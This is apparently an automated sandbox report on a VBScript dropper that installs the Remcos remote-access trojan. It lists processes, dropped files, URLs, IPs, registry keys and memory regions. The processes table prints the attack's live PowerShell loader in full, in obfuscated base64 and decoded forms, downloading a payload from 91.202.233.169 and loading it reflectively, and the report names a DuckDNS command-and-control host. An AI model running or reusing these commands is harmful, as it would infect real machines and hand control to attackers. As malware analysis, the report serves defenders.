Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
sostener.vbs
|
Unicode text, UTF-16, little-endian text, with very long lines (325), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\ProgramData\remcos\registros.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\json[1].json
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4qhn3up5.213.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_czrpacwp.ndu.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_enrupsoj.ymi.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_huhpgnei.lkn.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hxryu1dp.nvd.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_se0k430p.vcw.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\dll01.txt
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
There are 2 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??Og?v?C8?OQ?x?C4?Mg?w?DI?Lg?y?DM?Mw?u?DE?Ng?5?C8?V?Bh?Gs?LwBS?GU?Zw?v?E0?YQBy?Ho?LwBE?FI?Rw?v?FI?V?BD?C8?QQBE?C8?Z?Bs?Gw?LgB0?Hg?d??n?C??Ow?k?EM?WQBy?Eo?U??g?D0?I??o?C??WwBT?Hk?cwB0?GU?bQ?u?Ek?Tw?u?F??YQB0?Gg?XQ?6?Do?RwBl?HQ?V?Bl?G0?c?BQ?GE?d?Bo?Cg?KQ?g?Cs?I??n?GQ?b?Bs?D??MQ?u?HQ?e?B0?Cc?I??p?C??OwBJ?G4?dgBv?Gs?ZQ?t?Fc?ZQBi?FI?ZQBx?HU?ZQBz?HQ?I??t?FU?UgBJ?C??J?BD?EM?UgBo?G0?I??t?E8?dQB0?EY?aQBs?GU?I??k?EM?WQBy?Eo?U??g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?I?Bw?G8?dwBl?HI?cwBo?GU?b?Bs?C4?ZQB4?GU?I??t?GM?bwBt?G0?YQBu?GQ?I?B7?C??J?BD?Fk?cgBK?F??I??9?C??K??g?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?C??KQ?g?Ds?J?Bn?Ec?aQBt?EE?I??9?C??K??g?Ec?ZQB0?C0?QwBv?G4?d?Bl?G4?d??g?C0?U?Bh?HQ?a??g?CQ?QwBZ?HI?SgBQ?C??KQ?g?Ds?I?B9?C??Ow?k?Hg?awBs?Gw?a??g?D0?I??n?D??Jw?g?Ds?J?Bi?H??dgBy?HY?I??9?C??Jw?l?Eo?awBR?GE?cwBE?GY?ZwBy?FQ?Zw?l?Cc?I??7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?bQBx?G8?bgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?I?BH?GU?d??t?EM?bwBu?HQ?ZQBu?HQ?I??t?F??YQB0?Gg?I??k?EM?WQBy?Eo?U??g?Ck?LgBy?GU?c?Bs?GE?YwBl?Cg?Jw?k?CQ?Jw?s?Cc?QQ?n?Ck?I??p?C??OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?G0?cQBv?G4?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?C??JwBk?EE?Qg?0?EE?S?BR?EE?T?Bn?EI?MgBB?Ec?O?BB?GI?ZwBB?DU?QQBE?EU?QQBj?Hc?QgB2?EE?S?BN?EE?T?B3?EI?egBB?Ec?UQBB?Fk?UQBC?HY?QQBH?Hc?QQBi?Gc?Qg?z?EE?Rw?4?EE?WgBB?EE?dgBB?EQ?awBB?E0?UQBC?Gw?QQBI?Ek?QQBZ?Gc?QgB0?EE?RwBV?EE?YQBR?EI?MgBB?Ec?O?BB?GI?ZwBB?HY?QQBD?D??QQBM?FE?QQ?y?EE?R?Bj?EE?TgBR?EE?M?BB?Eg?SQBB?GI?dwBC?D??QQBH?E0?QQBa?FE?QgBv?EE?Qw?4?EE?WgB3?EI?eQBB?Ec?O?BB?Ew?ZwBC?D??QQBH?FU?QQBh?Hc?QgBq?EE?S?BV?EE?WQBn?EI?M?BB?Ec?awBB?Fk?ZwBB?HY?QQBD?Dg?QQBP?Gc?QgB6?EE?S?BB?EE?Z?BB?EI?M?BB?Ec?ZwBB?Cc?I??s?C??J?Bi?H??dgBy?HY?I??s?C??JwBf?F8?XwBf?F8?cwBj?HM?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?Hg?awBs?Gw?a??s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?C??Ow?=';$Yolopolhggobek
= [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek
= $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\sostener.vbs');powershell $Yolopolhggobek;
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm
= 'http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt' ;$CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;Invoke-WebRequest
-URI $CCRhm -OutFile $CYrJP -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $CYrJP = ( [System.IO.Path]::GetTempPath()
+ 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ; } ;$xkllh = '0' ;$bpvrv = 'C:\Users\user\Desktop\sostener.vbs' ;[Byte[]]
$mqons = [system.Convert]::FromBase64String( ( Get-Content -Path $CYrJP ).replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($mqons).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null,
[object[]] ( 'dAB4AHQALgB2AG8AbgA5ADEAcwBvAHMALwBzAGQAYQBvAGwAbgB3AG8AZAAvADkAMQBlAHIAYgBtAGUAaQB2AG8AbgAvAC0ALQA2ADcANQA0AHIAbwB0AGMAZQBoAC8AZwByAG8ALgB0AGUAawBjAHUAYgB0AGkAYgAvAC8AOgBzAHAAdAB0AGgA'
, $bpvrv , '_____scs_______________________________________-------', $xkllh, '1', 'Roda' )) ;"
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c
|
|
|
|
C:\Windows\System32\PING.EXE
|
"C:\Windows\system32\PING.EXE" 127.0.0.1
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand IAAkAEMAWQByAEoAUAAgAD0AIAAoACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAIAApACAAOwAkAGcARwBpAG0AQQAgAD0AIAAoACAARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABDAFkAcgBKAFAAIAApACAAOwAgAA==
-inputFormat xml -outputFormat text
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
|
unknown
|
|
|
|
http://91.202.233.169
|
unknown
|
|
|
|
http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/A
|
unknown
|
|
|
|
http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AC/Pef3.txt
|
91.202.233.169
|
|
|
|
remcosnov24.duckdns.org
|
|
||
|
http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt
|
91.202.233.169
|
|
|
|
https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
|
unknown
|
|
|
|
http://91.202.
|
unknown
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
|
https://bbuseruploads.s3.amazonaws.com
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://geoplugin.net/json.gpl
|
unknown
|
||
|
http://geoplugin.net/json.gpk
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://bbuseruploads.s3.amazohj6
|
unknown
|
||
|
http://bitbucket.org
|
unknown
|
||
|
https://web-security-reports.services.atlassian.com/csp-report/bb-website
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
|
unknown
|
||
|
https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
|
unknown
|
||
|
https://dz8aopenkvv6s.cloudfront.net
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://geoplugin.net/json.gpSystem32
|
unknown
|
||
|
http://geoplugin.net/json.gp
|
178.237.33.50
|
||
|
https://bbuseruploads.s3.amazonaws.com/ed63b646-30bf-4545-bacd-1a1d263f75fb/downloads/6d9f1851-1729-
|
unknown
|
||
|
https://bitbucket.org/hector4576--/noviembre19/downloads/sos
|
unknown
|
||
|
http://geoplugin.net/json.gp/C
|
unknown
|
||
|
https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
|
unknown
|
||
|
http://crl.veris
|
unknown
|
||
|
http://91.202.H
|
unknown
|
||
|
https://cdn.cookielaw.org/
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://oneget.orgX
|
unknown
|
||
|
https://aui-cdn.atlassian.com/
|
unknown
|
||
|
https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;
|
unknown
|
||
|
https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://bitbucket.org/hector4576--/noviembre19/downloads/sos19nov.txt
|
185.166.143.49
|
||
|
http://s3-w.us-east-1.amazonaws.com
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://bitbucket.org
|
unknown
|
||
|
http://bbuseruploads.s3.amazonaws.com
|
unknown
|
||
|
https://oneget.org
|
unknown
|
There are 37 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
remcosnov24.duckdns.org
|
190.9.223.135
|
|
|
|
s3-w.us-east-1.amazonaws.com
|
52.217.196.57
|
||
|
bitbucket.org
|
185.166.143.49
|
||
|
geoplugin.net
|
178.237.33.50
|
||
|
bbuseruploads.s3.amazonaws.com
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
91.202.233.169
|
unknown
|
Russian Federation
|
|
|
|
190.9.223.135
|
remcosnov24.duckdns.org
|
Colombia
|
|
|
|
127.0.0.1
|
unknown
|
unknown
|
|
|
|
185.166.143.49
|
bitbucket.org
|
Germany
|
||
|
178.237.33.50
|
geoplugin.net
|
Netherlands
|
||
|
52.217.196.57
|
s3-w.us-east-1.amazonaws.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-0883UG
|
exepath
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-0883UG
|
licence
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-0883UG
|
time
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 7 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
1158000
|
heap
|
page read and write
|
|
|
|
25F20450000
|
trusted library allocation
|
page read and write
|
|
|
|
400000
|
remote allocation
|
page execute and read and write
|
|
|
|
25F206D9000
|
trusted library allocation
|
page read and write
|
|
|
|
CD072FE000
|
stack
|
page read and write
|
||
|
22613E50000
|
heap
|
page read and write
|
||
|
26C310EE000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC5C0000
|
trusted library allocation
|
page read and write
|
||
|
25F28C70000
|
trusted library section
|
page read and write
|
||
|
25F2893F000
|
heap
|
page read and write
|
||
|
2262DFA0000
|
heap
|
page read and write
|
||
|
1140000
|
heap
|
page read and write
|
||
|
25F11F91000
|
trusted library allocation
|
page read and write
|
||
|
17AE384E000
|
heap
|
page read and write
|
||
|
22615A51000
|
trusted library allocation
|
page read and write
|
||
|
25F28ECE000
|
heap
|
page read and write
|
||
|
17AE5DAB000
|
heap
|
page read and write
|
||
|
A4C7EFE000
|
stack
|
page read and write
|
||
|
267738CA000
|
heap
|
page read and write
|
||
|
25F101C0000
|
trusted library allocation
|
page read and write
|
||
|
25F103D0000
|
heap
|
page read and write
|
||
|
26C32531000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC370000
|
trusted library allocation
|
page read and write
|
||
|
2262DEA0000
|
heap
|
page read and write
|
||
|
7FFAAC520000
|
trusted library allocation
|
page execute and read and write
|
||
|
25F108FE000
|
trusted library allocation
|
page read and write
|
||
|
26C2F1A0000
|
heap
|
page read and write
|
||
|
26C3295B000
|
trusted library allocation
|
page read and write
|
||
|
8A50A3E000
|
stack
|
page read and write
|
||
|
7FFB1E0E0000
|
unkown
|
page readonly
|
||
|
7FFAAC5D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC512000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC552000
|
trusted library allocation
|
page read and write
|
||
|
A4C85BE000
|
stack
|
page read and write
|
||
|
A4C863B000
|
stack
|
page read and write
|
||
|
903FBFE000
|
stack
|
page read and write
|
||
|
26C41080000
|
trusted library allocation
|
page read and write
|
||
|
22613FCB000
|
heap
|
page read and write
|
||
|
7FFB1E3B6000
|
unkown
|
page readonly
|
||
|
7FFAAC670000
|
trusted library allocation
|
page read and write
|
||
|
1B92B630000
|
heap
|
page read and write
|
||
|
25F109FD000
|
trusted library allocation
|
page read and write
|
||
|
17AE56FA000
|
heap
|
page read and write
|
||
|
CD075FE000
|
stack
|
page read and write
|
||
|
8A5077D000
|
stack
|
page read and write
|
||
|
7FFAAC333000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC362000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC5E0000
|
trusted library allocation
|
page read and write
|
||
|
17AE385D000
|
heap
|
page read and write
|
||
|
7FFAAC510000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC650000
|
trusted library allocation
|
page read and write
|
||
|
25F11A07000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC36D000
|
trusted library allocation
|
page execute and read and write
|
||
|
25F28924000
|
heap
|
page read and write
|
||
|
25F0E727000
|
heap
|
page read and write
|
||
|
8A5067F000
|
stack
|
page read and write
|
||
|
25F28810000
|
heap
|
page read and write
|
||
|
25F0E9E0000
|
heap
|
page read and write
|
||
|
7FFAAC660000
|
trusted library allocation
|
page read and write
|
||
|
25F1095E000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC5F0000
|
trusted library allocation
|
page read and write
|
||
|
22613FD0000
|
heap
|
page read and write
|
||
|
25F11A02000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC670000
|
trusted library allocation
|
page read and write
|
||
|
25F10A4E000
|
trusted library allocation
|
page read and write
|
||
|
25F11DFA000
|
trusted library allocation
|
page read and write
|
||
|
226160BB000
|
trusted library allocation
|
page read and write
|
||
|
8A50938000
|
stack
|
page read and write
|
||
|
7FFAAC610000
|
trusted library allocation
|
page read and write
|
||
|
4FC25FE000
|
stack
|
page read and write
|
||
|
3A7E000
|
stack
|
page read and write
|
||
|
8A516CE000
|
stack
|
page read and write
|
||
|
7FFAAC4EA000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC6E7000
|
trusted library allocation
|
page read and write
|
||
|
25F203F0000
|
trusted library allocation
|
page read and write
|
||
|
22615AB8000
|
trusted library allocation
|
page read and write
|
||
|
22615B6F000
|
trusted library allocation
|
page read and write
|
||
|
26C2F1E8000
|
heap
|
page read and write
|
||
|
4FC218A000
|
stack
|
page read and write
|
||
|
25F10A8A000
|
trusted library allocation
|
page read and write
|
||
|
25F10997000
|
trusted library allocation
|
page read and write
|
||
|
26C49070000
|
heap
|
page read and write
|
||
|
26C490D9000
|
heap
|
page read and write
|
||
|
25F28910000
|
heap
|
page read and write
|
||
|
26C490B2000
|
heap
|
page read and write
|
||
|
26C30EF3000
|
heap
|
page read and write
|
||
|
17AE38AD000
|
heap
|
page read and write
|
||
|
2262DEE0000
|
heap
|
page read and write
|
||
|
CD07477000
|
stack
|
page read and write
|
||
|
267738C0000
|
heap
|
page read and write
|
||
|
26C2F1E0000
|
heap
|
page read and write
|
||
|
473000
|
remote allocation
|
page execute and read and write
|
||
|
17AE3856000
|
heap
|
page read and write
|
||
|
26C2F1E2000
|
heap
|
page read and write
|
||
|
22615E06000
|
trusted library allocation
|
page read and write
|
||
|
22615E42000
|
trusted library allocation
|
page read and write
|
||
|
17AE3A6D000
|
heap
|
page read and write
|
||
|
26C31060000
|
heap
|
page read and write
|
||
|
7FFAAC5C0000
|
trusted library allocation
|
page read and write
|
||
|
17AE386D000
|
heap
|
page read and write
|
||
|
CD073F9000
|
stack
|
page read and write
|
||
|
26C4910E000
|
heap
|
page read and write
|
||
|
7FFAAC5F0000
|
trusted library allocation
|
page read and write
|
||
|
226140E0000
|
heap
|
page read and write
|
||
|
476000
|
remote allocation
|
page execute and read and write
|
||
|
2E7F000
|
stack
|
page read and write
|
||
|
7FFAAC332000
|
trusted library allocation
|
page read and write
|
||
|
25F28993000
|
heap
|
page read and write
|
||
|
22613EF0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC640000
|
trusted library allocation
|
page read and write
|
||
|
25F10A7F000
|
trusted library allocation
|
page read and write
|
||
|
26C30A60000
|
trusted library allocation
|
page read and write
|
||
|
22613F10000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC410000
|
trusted library allocation
|
page read and write
|
||
|
30BF000
|
stack
|
page read and write
|
||
|
25F10906000
|
trusted library allocation
|
page read and write
|
||
|
1B92B420000
|
heap
|
page read and write
|
||
|
129D000
|
stack
|
page read and write
|
||
|
26C49140000
|
heap
|
page read and write
|
||
|
26773AC0000
|
heap
|
page read and write
|
||
|
25F1045D000
|
trusted library allocation
|
page read and write
|
||
|
8A5047E000
|
stack
|
page read and write
|
||
|
25F102A6000
|
heap
|
page read and write
|
||
|
7FFAAC511000
|
trusted library allocation
|
page read and write
|
||
|
26C32517000
|
trusted library allocation
|
page read and write
|
||
|
8A517CD000
|
stack
|
page read and write
|
||
|
7FFAAC570000
|
trusted library allocation
|
page read and write
|
||
|
4FC2AFD000
|
stack
|
page read and write
|
||
|
7FFB1E102000
|
unkown
|
page readonly
|
||
|
25F287F0000
|
trusted library section
|
page read and write
|
||
|
CD070FE000
|
stack
|
page read and write
|
||
|
8A504FF000
|
stack
|
page read and write
|
||
|
17AE3900000
|
heap
|
page read and write
|
||
|
2262DEA2000
|
heap
|
page read and write
|
||
|
25F2078C000
|
trusted library allocation
|
page read and write
|
||
|
17AE660F000
|
heap
|
page read and write
|
||
|
7FFAAC5A0000
|
trusted library allocation
|
page read and write
|
||
|
17AE5A4F000
|
heap
|
page read and write
|
||
|
22625A5F000
|
trusted library allocation
|
page read and write
|
||
|
26C31071000
|
trusted library allocation
|
page read and write
|
||
|
25F0E8D0000
|
heap
|
page read and write
|
||
|
8A50ABE000
|
stack
|
page read and write
|
||
|
26C410EE000
|
trusted library allocation
|
page read and write
|
||
|
8A5160E000
|
stack
|
page read and write
|
||
|
22615A6D000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC680000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC580000
|
trusted library allocation
|
page read and write
|
||
|
26C30BA4000
|
heap
|
page read and write
|
||
|
22613E70000
|
heap
|
page read and write
|
||
|
903FA7F000
|
unkown
|
page read and write
|
||
|
7FFAAC680000
|
trusted library allocation
|
page read and write
|
||
|
25F2891C000
|
heap
|
page read and write
|
||
|
7FFAAC3F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB1E100000
|
unkown
|
page read and write
|
||
|
26C49151000
|
heap
|
page read and write
|
||
|
25F10A8E000
|
trusted library allocation
|
page read and write
|
||
|
17AE386D000
|
heap
|
page read and write
|
||
|
A4C82BE000
|
stack
|
page read and write
|
||
|
26C2F434000
|
heap
|
page read and write
|
||
|
25F28D00000
|
heap
|
page read and write
|
||
|
7FFAAC5D0000
|
trusted library allocation
|
page read and write
|
||
|
8A508B7000
|
stack
|
page read and write
|
||
|
2262DFC0000
|
heap
|
page read and write
|
||
|
30FD000
|
stack
|
page read and write
|
||
|
17AE385C000
|
heap
|
page read and write
|
||
|
7FFAAC500000
|
trusted library allocation
|
page execute and read and write
|
||
|
226160B4000
|
trusted library allocation
|
page read and write
|
||
|
2261402B000
|
heap
|
page read and write
|
||
|
25F10A6E000
|
trusted library allocation
|
page read and write
|
||
|
17AE3846000
|
heap
|
page read and write
|
||
|
25F0E6E0000
|
heap
|
page read and write
|
||
|
4FC2BFE000
|
stack
|
page read and write
|
||
|
22613F30000
|
trusted library allocation
|
page read and write
|
||
|
17AE389B000
|
heap
|
page read and write
|
||
|
17AE53A0000
|
heap
|
page read and write
|
||
|
25F1098E000
|
trusted library allocation
|
page read and write
|
||
|
25F108F4000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC5B0000
|
trusted library allocation
|
page read and write
|
||
|
17AE386D000
|
heap
|
page read and write
|
||
|
7FFAAC620000
|
trusted library allocation
|
page read and write
|
||
|
226159C7000
|
heap
|
page execute and read and write
|
||
|
7FFAAC38D000
|
trusted library allocation
|
page execute and read and write
|
||
|
CD0767E000
|
stack
|
page read and write
|
||
|
8A5083E000
|
stack
|
page read and write
|
||
|
A4C7FFC000
|
stack
|
page read and write
|
||
|
7FFB1E0E1000
|
unkown
|
page execute read
|
||
|
7FFB1E0F6000
|
unkown
|
page readonly
|
||
|
7FFAAC380000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC4F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
17AE56F0000
|
heap
|
page read and write
|
||
|
7FFAAC37B000
|
trusted library allocation
|
page read and write
|
||
|
3D6E000
|
stack
|
page read and write
|
||
|
25F0E72B000
|
heap
|
page read and write
|
||
|
25F10AC0000
|
trusted library allocation
|
page read and write
|
||
|
25F28807000
|
heap
|
page execute and read and write
|
||
|
25F28F10000
|
heap
|
page read and write
|
||
|
22613F88000
|
heap
|
page read and write
|
||
|
7FFAAC540000
|
trusted library allocation
|
page read and write
|
||
|
1B92B440000
|
heap
|
page read and write
|
||
|
7FFAAC420000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC360000
|
trusted library allocation
|
page read and write
|
||
|
12A6000
|
heap
|
page read and write
|
||
|
903FAFF000
|
stack
|
page read and write
|
||
|
CD0727F000
|
stack
|
page read and write
|
||
|
7FFAAC5A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC6D2000
|
trusted library allocation
|
page read and write
|
||
|
1B92B45E000
|
heap
|
page read and write
|
||
|
A4C80FE000
|
stack
|
page read and write
|
||
|
A4C823E000
|
stack
|
page read and write
|
||
|
26C49330000
|
heap
|
page read and write
|
||
|
22615A9B000
|
trusted library allocation
|
page read and write
|
||
|
22615A74000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC640000
|
trusted library allocation
|
page read and write
|
||
|
26C32A4A000
|
trusted library allocation
|
page read and write
|
||
|
17AE37F0000
|
heap
|
page read and write
|
||
|
A4C807E000
|
stack
|
page read and write
|
||
|
226160C2000
|
trusted library allocation
|
page read and write
|
||
|
325E000
|
stack
|
page read and write
|
||
|
7FFB1E3A0000
|
unkown
|
page readonly
|
||
|
26C2F200000
|
heap
|
page read and write
|
||
|
22615FAD000
|
trusted library allocation
|
page read and write
|
||
|
22613EB0000
|
heap
|
page read and write
|
||
|
26C3252F000
|
trusted library allocation
|
page read and write
|
||
|
26C30AD3000
|
trusted library allocation
|
page read and write
|
||
|
4FC2DFC000
|
stack
|
page read and write
|
||
|
7FFAAC5F0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC3E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC416000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC521000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC374000
|
trusted library allocation
|
page read and write
|
||
|
22613F20000
|
heap
